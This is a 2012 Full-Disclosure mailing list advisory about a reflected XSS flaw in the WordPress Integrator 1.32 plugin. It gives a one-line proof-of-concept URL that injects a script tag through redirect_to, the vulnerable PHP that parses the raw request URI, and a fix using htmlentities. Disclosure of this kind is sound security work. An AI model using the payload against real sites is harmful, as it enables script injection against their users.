[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] WordPress plugin 'WordPress Integrator 1.32' XSS vulnerability

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Advisory: WordPress plugin 'WordPress Integrator 1.32' XSS vulnerability
Advisory ID: SSCHADV2012-010
Author: Stefan Schurtz
Affected Software: Successfully tested on WordPress Integrator 1.32
Vendor URL: http://wordpress.org/extend/plugins/wp-integrator/
Vendor Status: informed

==========================
Vulnerability Description
==========================

The WordPress plugin 'WordPress Integrator' is prone to a XSS vulnerability

==================
PoC-Exploit
==================

http://target/wordpress/wp-login.php?redirect_to=http://%3F1<ScrIpT>alert(666)</ScrIpT>

// vulnerable code in wp-integrator.php

function init_handler() {
                $url = parse_url($_SERVER["REQUEST_URI"]);

=========
Solution
=========

function init_handler() {
                $url = parse_url(htmlentities($_SERVER["REQUEST_URI"]));

====================
Disclosure Timeline
====================

19-Mar-2012 - vendor informed
20-Mar-2012 - vendor informed (plugins@xxxxxxxxxxxxx)

========
Credits
========

Vulnerability found and advisory written by Stefan Schurtz.

===========
References
===========

http://www.darksecurity.de/advisories/2012/SSCHADV2012-010.txt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (MingW32)
Comment: Thunderbird-Portable 3.1.20 by GnuPT - Gnu Privacy Tools
Comment: Download at: http://thunderbird.gnupt.de

iEYEARECAAYFAk9xt3oACgkQg3svV2LcbMCoFQCdEqaArwVj3iuuCAqtljPkVGXS
1xgAn0ItuQyF6kMKxf0DQi1ppNWrHG9E
=0eCo
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/